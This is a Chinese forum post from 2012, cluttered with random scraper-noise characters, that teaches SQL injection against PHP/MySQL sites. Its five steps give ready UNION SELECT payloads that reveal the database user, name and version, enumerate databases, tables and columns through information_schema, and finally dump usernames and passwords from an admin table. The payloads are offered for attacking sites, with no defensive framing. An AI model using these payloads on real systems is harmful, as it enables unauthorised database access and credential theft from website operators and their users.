3 {( s& f+ _. e/ Q$ }6 l教程内容:Mysql 5+php 注入
2 z. W" C+ ~, A6 I" u: i: h4 b/ |9 L: N# y# U3 S
1 W b) x+ T/ ?/ ]' S }1 p/ b
# I+ V5 S' Y6 \5 m$ L一.查看MYSQL基本信息(库名,版本,用户)/ L7 t. g. }+ y
% G. ]+ L" c \9 p7 Land 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*' s# g1 m8 T1 v0 }* H" _
' _6 a& F! t% r( y0 ^二.查数据库
/ Z7 Y# G" {/ x/ _: B: X
j$ `$ v$ m& L. Jand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*1 A+ l2 w1 _! G
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
/ K, g" O0 G% h/ d1 V* W) V5 M( [# Q, d) T
三.暴表
& U. H7 `# `6 x* r) ]9 a5 |: z3 ^- Q8 Q3 q- B$ s
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*& N5 n4 J: q. \% f* q! m( J1 O
8 |3 X/ R2 L1 g3 ]( F- C) f
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。( T4 e4 M9 P. F' H! V- n" V* V
3 ~$ y k. X; B# `3 i5 ]2 \" B四.暴字段6 A2 b8 E+ |- `5 k/ j# C. ]% n, u
) |+ X$ @2 G& z$ a$ Q/ \
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
3 F; k* y/ Y' R, N
$ W4 z2 q9 L: W2 x" ^limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
9 Q( w9 q) B: R0 P! l9 t) ?% f L
8 X* t& s" R& t五.暴数据9 @; J% r) Q- J4 z; A7 O
5 _5 }2 B! B; G2 b! X) p
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
, O2 Y& z( ~! v4 l( K
4 l5 v+ ]8 E( p: h
7 Z: X" r+ H0 w' O0 h: C这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
3 ^( W) R/ K7 O: F7 A7 s; Z |
发表于 2012-9-13 16:27:53
收藏
支持
反对